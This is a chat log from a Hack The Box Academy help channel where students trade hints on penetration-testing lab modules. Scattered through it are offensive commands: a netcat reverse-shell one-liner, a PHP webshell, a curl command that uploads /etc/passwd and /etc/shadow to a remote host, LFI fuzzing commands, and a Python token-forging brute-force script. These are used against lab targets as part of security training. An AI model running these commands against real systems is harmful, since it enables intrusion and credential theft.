yesterday spent 1-2 hours just watching it freeze every few seconds before giving up

Hey, need help with Windows PrivEsc Module. Currently, I'm on section DnsAdmins. Successfuly added netadm to Domain Admins group, but can't read flag.txt. It seems that I am skipping something, but idk what...

hello

oh i think this is a bug or something but i can't either and even a dll rev shell don't work for me i end up have to create a normal metasploit rev shell and instead of adding the given user to the admin group like in the example payload i just run my rev shell so try that maybe

yeah the NoMachine suck ass and slow as hell too but i'm pretty sure you can still use copy and paste at least that's i try with the old pwnbox

but if i'd get a rev shell of netadm, i'd have the same privs and won't be able to read the file anyway, or what do you mean?

ughhhhh i hate pwnbox as well 😠 i just wanna use my VM 😥

yea me too the new pwnbox suck

so if you use the payload so in Loading DLL as Non-Privileged User the dll msfvenom payload will be run with nt authority system

Oh, really? Didn't know that, thanks

ok so i double hate the new pwnbox now, some of the exploit in metasploit don't work for me but it's seem like the exploit was success but i don't get any shell and after some debugging i found out i need to run metasploit as root or some exploit don't work because metasploit don't have permission to use some port

Need help 🙂

**Path **: Penetration Tester
Module: ATTACKING COMMON SERVICES
Question: What is the password for the username "jason"?

Tried brute forcing SMB using crackmapexec and metasploit (smb_logon) via passwords.list (acquired from ftp server). No luck.

is there a way to fix the broken instance timers? theyve been ok for me recently but now again back to counting down at about 5x the actual speed

Hey guys for the footprint module regarding IMAP/POP3. I logged in and checked every inbox and tehy all say 0 EXISTS 0 RECENT

quit

@vital seal @fierce sparrow which section?

there are 2 mail box remember to check both

Its this part here. Attacking common services module.

when i do list all i see 4 but all of them return 0

hint check in ||DEV.DEPARTMENT.INT|| and they didn't show the command did you need and you can file that command here https://donsutherland.org/crib/imap

i use auxiliary/scanner/smb/smb_login in metasploit with the given password list

I just made a list of the directories I should be searching, and quickly checked them out by hand. The flag was so obvious. I must have been blind the first time I tried the challenge as I missed that dir.

I used that one as well with the password list taken from ftp server. All failed login, with username set as 'jason'

what ftp server? i don't remember that and there are no mention of that in my note i mean the given wordlist from the resource

oh wait

let me double check everything

sure! It was from ftp server, passwords.list

got it thx for the help. Much appreciated

nope use the PWs.list from the Resources

wait where did u get the Resources from?

oh lmao

thank you so much!!!

Hello all, I'm working on the Information Gathering - Web Edition module and I'm stuck on the Active Subdomain enumeration section question that asks for a TXT record "Find and submit the contents of the TXT record as the answer." Been using dig and nslookup with no luck. Could someone DM me or give me a nudge on this? Think I've been stuck in a rabbit hole for a while now. I'm able to perform the zone transfer but I don't think I'm looking in the right place for the TXT record.

i'm not sure what even is a dns zone but if you do a dns zone transfer with the mean do main you will find a subdomain that have the same ip as the mean domain use dig txt with that subdomain

Hi, need some help with hacking wordpress, skills assessment: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. I have found the vulnerable plugin (my answer for the next question, plugin version is correct), and I can exploit the vulnerability to see any files. But, where's the flag file?

Edit: once you find and exploit the unauthenticated file download vulnerability, the flag will appear.

check that plugin on exploit-db check flag in that exploit example

Can't find anything on exploitdb. Is ||Site Editor|| the correct plugin for this question? I got LFI with it, but don't know where to look for the flag

oh wait which question?

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download, from skills assessment. I'm trying to use ||Site Editor||

oh that one and the LFI one is different

and nope it it's the ||Site Editor||

stuck on last stretch of footprinting lab hard
|| any hints after logging in as tom on footprint lab hard? Struggling to find a way to access mysql server ||

hint check what is running on the target machine

Sorry to keep bothering, but I still can't find the flag file for this question. I've now done all of them, including getting a shell on the system as www-data.
I also tried looking for flag files on the system with find / -name "*flag*" 2>/dev/null, but only found the one I already have, from the directory listing question.
Or is the answer to this question not a flag?

nope it's a flag but for fing this plugin i have to run the wpscan with the api and the aggressive tag it took like 30 min but i think you should be able to find it with just the api key

and i didn't check where is that flag on the target machine so i'm not 100% sure but if you scan / it's going to take a bit but try this grep -irl HTB{ / 2>>/dev/null

I tried scanning with ||wpscan --api-token REDACTED --url http://blog.inlanefreight.local/ -e ap||, and I found ||3 plugins: email-subscribers (7 vulns), site-editor (1 vuln), and the-events-calendar (2 vulns)||.
I tried again find / -iname "*flag*" 2>/dev/null for case insensitive but only got the same flags I got before. I'll try your grep command, but it takes a long time to run and so far only found 2 flags, that I already knew (/home/erika, and the one from directory indexing)

and yep one of the plugin you list in the one look at verion and name up in exploit-db

@vital adder went and checked running services on the target. but still at a loss
|| I am ssh'd into the target as tom, I see mysql is running (rsync is there but not running) and then there are the services from nmap (pop3,imaps, ssh). There is a strange file /opt/tom-recovery.sh but it didn't lead anywhere||

hint the first thing you list

Hi

Mam dotaz

pls help

Can you hack?

ask that in #613049811481919508

I don't want to do something for the event

I want to put this gang on one server and destroy it

Can you please help?

That server is Czech

Please

not the event the channel and nope read the #rules

Pls

and why don't you help me

?

this is the place for learning cyber security not a darknet forums, what do you think?

Because what you are asking is illegal and therefore against the server and Discord rules.

Pls

i need it please

No. If you continue to ask either publicly or by messaging members, you will be removed from this server. We are not your private army to commit crime for you.

Found it. Apparently the vulnerability is just not listed in the wpscan output. The flag appears once you find and exploit the vulnerability. Thank you!

np

why do ports not show properly on HTB labs

Hi evervybody
I am at the modul footprinting... there is this command:
braa public@10.129.14.128:.1.3.6.*

can somebody explain the command? from the modul explanation i dont get it really...

i think you need to put some spoiler tag on that
sorry didn't realized that was the example command

but the command it's: (tool) (community strings)@(ip):(stuff that i don't understand)

oh wait they explain this

this nomachine setup is terrible.. absolute cancer to work with it

I cant even login....

its because it uses a us keyboard layout

For the footprinting lab - hard I only see pop and imap ports open should there be additional ports....? what am i missing

took me a while to figure it out lmao

you can spawn a keyboard and type it that way

@vital adder looking more into that service; sorry for repeated messages
|| Not sure how to get access to the mysql db without credentials; All I can think of is to try and brute force some user:passwd combos (maybe using user mysql)||

then when inside change the layout

did you use with the thing that you have?

yeah sorry maybe i just have to reread this.. 😉

hint nmap scans only tcp ports by default

do you recommend a wordlist to bruteforce the community string?

hint you can use wordlist in the example

nope not the given one

what example you talking about

oh isee

thx

which module should i do if i wanna become a hacker ?

Modul: Prohacker in 1 Day

start with the basics and then learn more

ok thx

Can someone please confirm that Getting Started / Public Exploits are working?

I can't get the flag either by the public or metasploit method

Using the method from exploit db
I am able to navigate and download things like wp-config.php with content inside

But I have tried /flag.txt
And trying to ../.. / my way to root folder

Also I am not able to get wp-config using metasploit

Using freshly installed Parrot OS

Finally 🥳 i completed Command Injections https://academy.hackthebox.com/achievement/433014/109. I did a payload generator so if someone wants to use it. Here it is https://github.com/josemlwdf/1nj3ct0r

more than 1200 payloads to test command injections. After that we just fuzz the parameters using the payloads and boom 🙂

I had this problem earlier today. Wasn’t sure where to go or what to do, thought I was going mad haha

And you didn't get the flag either?
Or did you get it in the end?

Nope I didn’t get the flag. I walked away until tomorrow.

Thanks for letting me know I'm not the only one 🙏

I really felt stupid until now 😅

for the footprint lab hard - can i get a hint regarding the creds once sshd in? (to be able to use database)

hint try what you got

LMAO

wow

forgot about that ahahahha

crazyy thx, im in

and if you are too lazy to find the flag like me you can use this ||select * from users where username = "HTB";||

yup i did that thx. its crazy how things can be right infront of you and totally miss it. I actually cant believe i didnt try to use what i have.

I think someone was asking about this the other day. Make sure ALL of your options in Metasploit are set correctly and your targeting what you are actually looking for.

I did, but I was not able to get /flag.txt (or many other ways of trying to fetch it) but I were able to get wp-config using the query exploit (non metasploit)

Do you mind if I DM you?

Feel free to, and thanks for asking 🙂

Guys in the shells and payload. Im trying to start the live engagement by connecting to nomachine. Im putting everything correctly but cant sign in

im using HTB machine

cant even rdp to it too.

you are typing the wrong password

im typing the HTB_@ca...

thats not the password

its longer than that

HTB_@cademy_stdnt!

gonna restart and try again

oh it worked when restarted weird.

which interface to i listen on when im inside the nomachine?

guys Payloads and Shells module, i try to copy the 50064 exploit. Finished the steps but somehow i cant update my db it either no permission or it fails

and when searching for the exploit it still tells me not found

try reload_all

which interface do i listen on when inside nomachine

the only thing i have about that in my note is 172.16.1.5

damn thanks alot this took me now almost 2hours lmao

need to note that :S

Finally done with payloads and shells... The skill assessment took almost as long as the rest of the module

gj

🙂

are u going for the cert? @polar crag

which cert are you talking about? ^^

My goal is the oscp yes

hopefully next year

this one

there is still a ton to learn

oh

is this new?

yeah

u are doing that path

damn nice

i will check it out

but yes im doing the Jr Pen teser path right now

are you going for it?

yeah, i got the bug bounty hunter one and now ill go for this one

then ill jump to oscp

awesome

once im done with the pentester path i will do the bug bounty path ^^

just to get more knowledge

nice

Hey, so doing the network enumeration with nmap module. Hit a question that is asking to enumerate the host name. I have tried several switches with nmap, but nothing is resolving the host name. Looking for help on trying to understand what I am over looking.

Hi can someone give me a nudge on Password Attacks Lab - Medium? Already got the D user but can't find a way to get root.

Edit: Got it, the key to overcoming the challenge is very close to one's own home

Cannot upload photo. Some sort of error?

Drag and drop not working.

try doing an aggressive scan, nmap -A 😉

Is anyone running into issues with their VPN? When I turn mine on, not only can I not see the target system, I cant ping any site at all :/

any chance youre mixing the academy VPN with the main site vpn

Nope

then dunno, its been working fine for me today

In fact, I am getting a resolution error now that I look at the VPN log

2022-10-03 20:54:58 RESOLVE: Cannot resolve host address: edge-us-academy-1.hackthebox.eu:1337 (Temporary failure in name resolution)

try swapping server

yep or the current DNS server your computer is using is having issues in that cas youd want to use a different DNS server

Okay, I think that worked

Thanks friends 🙂

anyone know how to fix this error:

[ERROR][com.freerdp.client.x11] - failed to open display:
[ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

trying to xfreerdp to a host from attack box provided in sectioin AD Skills Assessment II

Found it and felt dumb. If I just used a switch I nornally ise it would have poped up.

Now.. trying to tackel the Firewall and IDS/IPS- Hard lab. I can only find two tcp ports, but neither ones version is the answer...

Error opening local file flag.txt
What's wrong?

you are in the /root directory, move out of it

How? Just write cd /?

cd ~/

=d

Oh

It worked!
You're real hacker!

Hace you tried doing ||a UDP scan||

Quick question about the File Transfer module - is there a way to upload a zip to pwnbox? The task asks to upload a zip file to the windows target machine and I wonder how to get this file into the pwnbox first 😅

Guys, are you planning to develop a Cloud module in short term?

Can anyone tell me how this blood server works?

Hey. A udp scan doesn't return anything. I was able to find a third tcp port. Now just trying to figure out how to get netcat to connect to a filtered port...

Holy Shit I got it. I can not believe I didn't try one stupid switch. Granted the only time I have used it was when listening, not try to make a connection.

@fierce sparrow what is the problem

How to stop a Target instance? It ticks my minutes away also when idle...

Hey, i am completly stuck on the last question in footprinting DNS What is the FQDN of the host where the last octet ends with "x.x.x.203"? I used dns enum and also dig for zone transfer, but i cant find anything else than the internal.inlanefreight.htb subdomains which are all not transferable.

@zealous belfry what about on dev.inlanefright.htb

i found those but nothing more interesting dev.inlanefreight.htb 127.0.0.1 ns.dev.inlanefreight.htb - 10.129.18.200 mail1.dev.inlanefreight.htb - 10.12.3.112 dev2.dev.inlanefreight.htb - 10.12.3.6 dev1.dev.inlanefreight.htb -

@zealous belfry brute force dev.inlanefreight.htb

yikes a different wordlist now did it for me thank you

hi guys i am having issue with the module : Stack-Based Buffer Overflows on Windows x86 in remote code execution
my understanding is that you still need to be connected to the machine via remote in order to execute the program, however there is no username and pass provided in order to login. thanks

Good morning! Is there anyone that can help me with transfers using Curl?

ERROR 2013 (HY000): Lost connection to MySQL server at 'handshake: reading initial communication packet', system error: 11 --> db instances seem broken

https://reqbin.com/req/c-dot4w5a2/curl-post-file does this help? Whats the problem?

Hey, yeah, I'm using this command

curl -X POST https://10.10.16.7/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

It isn't uploading to the upload server I have running

I've tried it without quotes with double quotes

if you are using updog try curl -v -X POST -F "file=@/home/htb-ac453129/test;filename=test" -F "path=/home/htb-ac453129/test" http://127.0.0.1:9090/upload

using uploadserver

port ok?

didn't specify because https

on the upload server I'm seeing

[04/Oct/2022 07:57:16] "POST /upload HTTP/1.1" 400 -

curl -s -F "param1=foobar" -F "param2=@/etc/passwd" www.example.com/test maybe like this?

When I tried @rustic sage I get this...

<p>Message: Field "files" not found.</p>
<p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>

actually should u use -T?

instead of s?

or F

s is silent...not important..it kills verbose output...but -T instead of -F

That was different...

curl: Can't open 'data=@test.txt'!

i think -F and -d are more form related/http request stuff, the need content-type header set...-T seems more for system file uploads

Interestingly when I added -X in addition to -T , I got this...

   <p>Error code: 501</p>
    <p>Message: Unsupported method ('-F').</p>
    <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>

lemme try lol

Hello,Could some one give me hint about Brute Forcing Cookies question 1?
I try the following but can't get flag
||user:htbuser;role:student;time:1664883421
user:super user;role:superuser;time:1664883421
user:super user;role:student;time:1664883421
user:super user;role:superuser;time:1664883421
user:htbuser;role:super user;time:1664883421
user:htbuser;role:superuser;time:1664883421||

Im having the same issue, don't worry.

i figured out what was wrong. Do you need help to login ?

We'll see. I've restarted the machine again to see if it fixes anything. I'm having a lot of issues today with HacktheBox.

Yeah, still invalid password.

the keyboard layout is wrong. When you do something like shift+3 it wont do hashtag it will do open bracket. its fucked

If you are doing an @ sign you have to do shift+"

Figures. Thanks for the help. I'm really getting tired of these nuanced issues in the platform/modules

same

but its worth. amazing content

Still isn't working

Got it. Had to use the on-screen keyboard.

nice

nomachine setup is very bad

i hope i dont face it again

I just enabled SSH on it and stopped using nomachine

however, the machine itself becomes unresponsive every 2-3 minutes either way, big fan of that

Its practically unusable

I have to kill the process every couple of minutes

Anyone did Password Mutations (bruteforce ssh - sam)? I spent the entire lab time bruteforcing till my lab finished and it didnt crack it....

Yeah, delete the first 17000 from the list then start it again

omg

Hey, I am on Credential Hunting section in Windows PrivEsc module. Found file ||st...txt||, but HTB doesn't accept my answer. Can someone help?

how did you figure this out. I would have never have done that

wait which file? both of the question need a xml file

lol, then it's a trap

yep

that section is evil there is a shiton of trap

I tried 4 times and then someone here told me to do that

its so annoying that I have to install crackmapexec everytime i spin up the machine....

@wind gust install crackmapexec on your machine

no yeah I know i can use my own machine but I want to use the PWNBOX....

@wind gust so you will install cme every time you start the pwnbox

just saying it should be more convenient for the people that use the PWNBOX

Yes... if you look at tryhackme PWNBOX they always have all the tools you need installed for the lab why cant HTB do that

its not a deal breaker but annoying to say the least

@wind gust that is why i had to stop using pwnbox due to installing tools every time i start it

it seems to be like training to type "pipx install crackmapexec" without even looking at your keyboard

Hi guys, need some help with XSS Session Hijacking. None of the payloads listed in the lesson seem to work.

Edit: solved. I forgot the http:// part in my payload.

cross site scripting module? @solar granite

Yes

dm me

it seems that i can't ping the target in the "Web Enumeration" in the "Getting Started" module even when using the good IP, any reasons why ?

nope you can't ping the ip and that up come it a port put both of that in to google to access the target web server

Can I have help with the web attacks skills assessment? I found out how to || get user tokens, reset user passwords, and login as other users || but all the pages look the same. Having difficulties getting the admin user. 😭

in the ||/api.php/user/|| you can get user uid and you can get the admin user uid there but the admin username ||doesn't have "admin"|| in it but the word ||Admin|| does appear when you get the right uid

I am using a python script to manually automate all of this. Did you do this in Burp???

yep i use burp

oh and i scan script this in bash but i have do to some stuff right now i can make the script a send you that but i need a good bit right now

No prob. Take your time.

bit help

stuck at this Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

which module and section is this?

File Inclusion/Automated Scanning

so did you find the vulnerable parameter?

i did not

i fuzzed

fuz result was messy it didnt even bring anything

if you are using ffuf and there is too much false positive use some filter

and for finding the vulnerable parameter you can use the example command in at section under Fuzzing Parameters (but you need to add some filter)

let me try

oh and of you don't know what filter to try hint ||response size||

were do i lean to hack

idk how

?

tried bruteforcing rdp with hydra but i always got failed due to many errors
however i got the creds for rdp by bruteforcing smb with metasploit, wishend i would get them with rdp and hydra :S

oh wait this sounds familiar are you in the password attacks module?

ye

did it worked for you with hydra and rdp?

yea just i help help i guy that have the same issue

all i have in my note is this will crash the target machine so do last

and yes i think i did use hydra for that not sure how i got the cred in the end

i got the flag for that answer but i try to find a solution to that but thanks!

i can't use gobuster on it either

so i like

can't even do the module entirely

what command did you try?

oh wait i just try and hydra with rdp seem to be working fine for me and my target haven't crash

gobuster dir -u http:// targetip -w /usr/share/dirb/wordlist/common.txt

[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete

this is what i get

response size is set with -fs ?

in ffuf module

oh that's weird in my note i have the ccount not active for remote desktop error

yes look for the most common size for false positive and filter that out

that look right andd what error did you get?

-fs 42? or 2287

42 i guess

is the false pos

iirc (because i'm not on the good OS rn) i got an error that i can't reach the target

@vital adder

im using

ffuf -w Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://167.99.202.193:31162/index.php?FUZZ=value' -mc 200 -fs 42 -c -v```

i'll recheck that tmrw and i'll send a SS here

so can you access the target website?

that look fine but for me i just use the example command and 1 more size number

i think i couldn't

yeah then that's the issue

oh wait that target have a puclic ip

which one is the example command this one

$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

yep

this is lfi wait i think the other one is needed

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287```

right

oh yeah sorry this is the first one you need

filter for 2287 gives me hella false positives

so should i make it like the other sections 42

of that is what you see the most then yes

when i ran this i got the whole list as a false positive

response was 200

smh

@rustic sage try restart your target a couple time if you still can't access it try my target

but if you can access my target but not your then you need to report this issue to support but if you also can't access my target then there is an issue with your machine

is that the response code or the size?

result i get

status

will do, thx man

did you filter out 42? and you need to filter out 2309

hmm

yeah

i am trying rn

2309

okkkkk

finally

nice

i didnt know i should filter 2309

thanks bruv

its
view

found the flag

lesgooooooooooooooo

for anyone else doing the LFI thing

when u find the parameter
run Jhdix text on ?parameter=FUZZ and filter for 1935
the first result will be the ../../{sometimes}/etc/passwd
so u need to delete etc/passwd and put /flag.txt

im stuck in LFI assigment module, could someone help me to use the log poisoning?

did you got the assigment flag?

check cheat sheet

already did

I remember there was nothing but cheat sheet in this module

seens php is not allowing code injections

hm

check my notes

one minute

someone can give mea hint on Skill Assessment - Broken Authentication

Hi, did someone have same problem as me in Oopsie machine, I am currently trying to estabilish a reverse shell with the victim, it works but I can't send any commands

lemme send the script that I used

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

also, I don't have any firewall installed

@rustic sage there is a channel for machines #boxes

I can't see it, do I need to verify myself?

damn finally i got it

bruh it's luke smith lol

Used to be

before I verified myself

when i was using <?php system($_GET["cmd"]); ?> with "" not worked, i need to use 'cmd' not "cmd", in website, is wrote with "" double quotes, it was a fucking brain

@mystic perch

yeah im looking i dont have note

im look this machine

one minute

someone can give mea hint on Skill Assessment - Broken Authentication

For anybody who is doing the web attacks skills assessment can somebody explain why I get a different admin page?

i did

did u get ?

hey. its not related to the modules but idk where to ask. so my problem is that i want to resubscribe to the student plan stuff but it requires a 3D authentication or verification but nothing really happenes. i mean a pop up window show up for a few sec but then just disappeares and nothing happens. what should i do? whats the issue?

yes

finally!! the living hell is over 🥳 🎉

half of the tool i need isn't there but half of the issue is but still 🥳

wait they updated it?

the wallpaper

thats it?

eww tools still not there

lmao

at least wpscan work now

the pwnbox is way laggier now...

Seems like the htb-student / HTB_@cademy_stdnt! userpass combo is not working for the foothold on the Shells & Payloads skills assessment. Tried resetting pwnbox and target but neither solves the issue

try using the on-screen keyboard when you are at the login screen for the foothold machine

Oh wow, that indeed does the trick. Odd issue

Yes the keyboard layout is fucked

i think we are gonna try and update the module so it doesn't require nomachine

YES PLZZZZZZZZZ

Starting my hacking career today!

Might be a good idea to put this tip in the text of the module as well for now, would save you guys some time answering questions like mine

Was certified by comptia a few months ago but was unsure of what career to pursue

good luck xD

Welcome

to become more well rounded im trying to pick up some of these skills

thank you!

thank you!

Hi starting today as well

welcome @sharp hawk and @brisk spear 🙂

Thanks

what next??

hack the planet obviously

and what is my next step into that I mean??

a little confused

how do I get my root flag?

Getting the flags is usually done by identifying a vulnerability that had been covered in the module and exploiting it. Modules also have cheat sheets in them and some of the questions have a hint button

alright what are root flags?

just ran into one at the end of the Meow module and unsure how to answer it

Really?

Yeah

Eeem got a question for you guys,,, do I have to master javascript or python before I can progress in this??

No, and there is a tier 0 python 3 academy module if you are new to python

My mistake it is tier 1

If you aren’t doing Academy, but are working on starting point, then can check #welcome for info on how to verify. After that you can post in #starting-point

Ok

Hi, i have a problem with this question. Can someone help me? Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.

Am I the only one who finds Subnetting fricking confusing?

😭

same!

i hate it 🙂

I'm looking for a possible nudge on AD Enum & Attacks Skills Assessment II getting the flag on Admin desktop of DC01. I found the credentials for ||CT059||, but the ||SMB shares|| give me nothing and I can't ||RDP|| or ||evil-winrm|| to it either.

hello did you ever figure this one out im stuck on the first question"To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url."

Hiya! Doing the Linux Buffer Overflow module. Ive confirmed that I have the correct offset (I overwrite the EIP with \x66), so I go back and select an address in the middle of the NOPs that precede my shellcode. However, when I run this command, I get a Illegal instruction error :/ am I picking a bad address or something?

Actually, now that I am looking at it, the characters dont match up...the chars right before the return address do not match the end of the shellcode I input

o

Can someone help with "Skills Assessment - File Upload Attacks"? I'm stuck on being unable to locate the uploaded file.

Not sure where I'm missing. I tried to read the source code but do not see the way.

What is the Content-Type accepted by the server ?

Only image files are allowed like png,jpg

have you tried them all ?

Good night guys, I'm new here #br

which do you prefer, parrot or Kali?

I have carefully checked file upload (JPG,JPEG, and PNG) but do not see the way. Can I DM you.

Did you search for all possible types of images ?

OMG I'm finally finished with the Active Directory module. Thank the gods.

i felt the same way. was a tough one but a good one.

Hello I’m currently stuck on this question in the XSS module, "To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url."

Can someone please point me in the right direction

Agreed

Think about what, instead of what it is calling in the example, might get you the cookie.

Hi~ Could someone help me about Brute Forcing Cookies question 1 and 2 of BROKEN AUTHENTICATION😫
I have find out the decode step:
||question 1 : url -->base64 -->ascii hex
question 2 : Zlib --> base64 --> URL Encode||
but I don't know how to change about ||" user:htbuser;role:htbuser;time:1664935096"||

Guys, are you planning to develop a Cloud module in short term?

kali

@mystic perch parrot

hey i'm doing the starting point module in htb, there is part where i have to connect with the redis server in the target machine through redis-cli. but whenever i give the command "redis-cli -h hostname -p port", the terminal doesn't show anything and never connects. is there any solution for this?

@fierce sparrow yes

You can use Tools like this:
https://www.site24x7.com/tools/ipv4-subnetcalculator.html

Use tools like this and all the math becomes very simple.
https://www.site24x7.com/tools/ipv4-subnetcalculator.html

Hey, I am on module Windows PrivEsc section Windows Server. Did someone try other exploits than Task Scheduler? I have just tried all vulns that the target seems to have, but nothing works. Anyway, the module tells not to use the shown exploit and there are many vulns that you can use to esc your privs.

i think this unintended but try metasploit exploit suggester

try asking this in #starting-point

hint change it to ||super||

check the hint

Okay, thanks

That gives me 1 possible exploit, but you need to have admin's privs to exploit this successfuly(

sorry for the delay i just got done with some stuff shoot me a dm with the exploit that you try

Nevermind, I just exploited with Task Scheduler, thanks

ohh so that is the intended way

Hows currently doing HTB Academy?

I'm currently doing Linux Fundamentals...

?

so what is the issue?

guys im at lfi file inclusion prevention

second question

edited the php.ini file

in /var/www/html/ i put the php.shell

restarted the apache2 server

now how can i
Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.

hy guys i'm on Broken Authentication module on predictable tokens at the question "Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?" .... i have used this script

but it doesn't work... can anyone tell me where i wrong??

|| import requests
import time
from hashlib import md5

url = "http://134.209.26.70:31469/question1/"
data = {"submit": "htbuser"}
res = requests.post(url,data=data)
server_time = res.headers['Date']
temp_time = time.strptime(server_time, "%a, %d %b %Y %H:%M:%S %Z")
epoch_time = int(time.mktime(temp_time) * 1000)

start_time = epoch_time - 1000
end_time = epoch_time + 1000
fail_text = "Wrong token"

loop from start_time to now. + 1 is needed because of how range() works

for x in range(start_time, end_time + 1):
# get token md5
md5_token = md5(("htbadmin" + str(x)).encode()).hexdigest()
data = {
"submit": "check",
"token": md5_token
}

print("checking {} {}".format(str(x), md5_token))

# send the request
res = requests.post(url, data=data)

# response text check
if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()

||

stuck on password attack hard lab,
Cracked the backup file but can't mount it .. any hint?

Could someone tell me why the result are different?

Hi everybody, anybody done with UserEnum in broken authentication? Let me know got a question ❤️

Where can I report something that I think is wrong in a topic lesson? I'm talking about SQL Injection Fundamentals -> SQL Operators -> Multiple Operator Precedence (https://academy.hackthebox.com/module/33/section/192). The precedence listed in the topic is different from the precedence listed on mariadb documentation, linked in the lesson.

What I mean is the not operator ! is misplaced. In the topic it is below 3 other groups of operators, and on mariadb docs the not operator is almost at the very top, being the 3rd in precedence overall

Has anyone done linux Funadmentals?

you didnt check encode special characters

that would go in #858470491676737536

I had to google a program to mount it. Sorry but I dont remember what it was.

In the Academy do we have to answer all the questions to mark it complete ?

Ok, thank you

yes

i have

any hint ??

Sorry, I don't get your mean，How can I choose encode special characters?

I would guess your time is not being formatted correctly

yes

how can i formatted correctly it??

it should be in the format of 1648747768000

um,the result also different

dm me if you wanna get into the code

i have use a debugger and i have see that it is in this format 1648747768000
epoch_time variable is in this format

Yes

guys the machines dont respond

??

yeah sloppy for a while but its getting better

what do you mean they dont respond?

yes but its better now

Maybe there is a network issue from your end

maybe

can u help me on sum

Sum?

something

What is it?

on file inclusion

second last

topic

File Inclusion Prevention

I am out, you can post here someone here will help you of they wish so.

i posted but got ignored haha

anws dw take care

Need help on the Credential Hunting in Linux - I got a list of mutated version password from the hint but still cant seem to find the correct password.

Hi Friends,

Checking if anyone would be kind to offers some assistance, specifically regarding the Academy Module: Getting Started> Knowledge Check.

I solved the first part as follows: enumerated sub-domains with Gobuster, explored files, admin.xml mentioned ‘admin’ as a username (as part of email address), and then also provided a hashed password which was cracked with crackstation.com, revealed to be admin:admin. Logged into site, saw there was a notification on Support page, mentioned GetSimple CMS 3.3.15 being outdated.

Found an exploit on rapid7.com; used msfconsole to successfully exploit target, was able to get
first flag and complete question 01.

Leading us to the second (Privilege Escalation) part…

(Context: I am brand new to HTB and infosec in general, started September 4th. This is my first module, so at present I am learning how to do things without necessarily understanding why, with the faith that said understanding will develop in future. So in terms of approaching this problem I pretty much have the methodology used in Nibbles to go by at this point, not any experiential depth at all.)

I was able to download LinEnum on my system, and upload it onto target in Meterpreter. I then changed Meterpreter to a shell, gave executable privileges to LinEnum.sh, ran it, which produced a single notable result:

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

I thus assumed I would be able to append php (as we did with monitor.sh in Nibbles), however since it seems its a folder, I was unsure how this could be done. So indeed I can’t access the folder, and when I try to append it with echo the following error occurs:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.171 8443 >/tmp/f' | tee -a php tee: php: Permission denied

I tried sudo etc, many approaches, but stuck here. Would really appreciate any breadcrumb anyone might offer at this point.

Thanks!

password attacks? delete the first 17000 passwords from the mut list and re run

no its this one https://academy.hackthebox.com/module/147/section/1320

got me bro.

yeah, thats password attacks

There's a linux fundamentals module which might help you, not sure if you've taken it or what's covered, I haven't taken it myself.
In this case, learning what sudo does would be very helpful and lead you to the answer to your issue.

User www-data may run the following commands on gettingstarted: 
(ALL : ALL) NOPASSWD: /usr/bin/php

The above lines are really all you need to get root. Think of what ||sudo|| does and what ||/usr/bin/php|| is and what it does as well.

yeah the hint gives a password but it doesnt work

i tried different version of it too

the mut_password.list file has the password its just way down in there and you usually time out before getting to it

Active Directory Enumeration and Attacks Skills 1; I got the Kerberoastable users password but not sure how to get to MS01 any help?

Thanks Paddon, detour accepted 🙂

You're welcome

i hate bruteforcing so much

Also since I notice you like tools, there's one that's a perfect fit for this challenge. Not exactly a tool, it's a webpage with a curated list of Unix binaries and techniques that can be used to bypass security restrictions. You can try to find it yourself or see it here: ||https://gtfobins.github.io/||

Awesome, thank you.

Some hint about Bypassing Web Application Protections ?
From SQLMap module
https://academy.hackthebox.com/module/58/section/530

case 8

Anyone having timeout issues with the PHP webshell lab in the Shells & Payloads module? The target cannot seem to stay stable for more than a minute or so

not working

is that a zero or an "o" ?

it says anti-csrf token can't be found

Finally got it thanks to|| gtfobins||, will still go read up on the basics - thanks again.

pretty sure its a zero

it think i need to declare cookies somehow

someone online?

lots

I would like to get someone's input on if I'm missing something with a question in the ffuf module assessment can someone message me please

can you send me a DM for sqlmap module please ?

i am really stuck here and the connection keeps ending I don't know why

my rdp and ssh connections are getting refused to the foothold machine for the final challenge in the Shells & Payloads module. Is this is bug with the deployment? Trying to use anything other than the NoMachine connection because it is extremely unstable

you HAVE to use nomachine. and yes its flaky as hell

sigh

sup guys! i cant pass the broken authentication skills assessment. i tried to bruteforce password of support account but no one password is match. here is command i used to collect passwords:
grep '^[[:upper:]]' ./SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep '[[:punct:]]' | grep -E '^.{20,}$' >> pass.txt
what im doing wrong?

I can barely keep the nomachine connection alive long enough to browse to the web interface 🙃

same...

@rustic sage what is the problem

Random question:

Why does the metasploit prompt in the parrot machine differ from that of the normal metasploit prompt in kali?

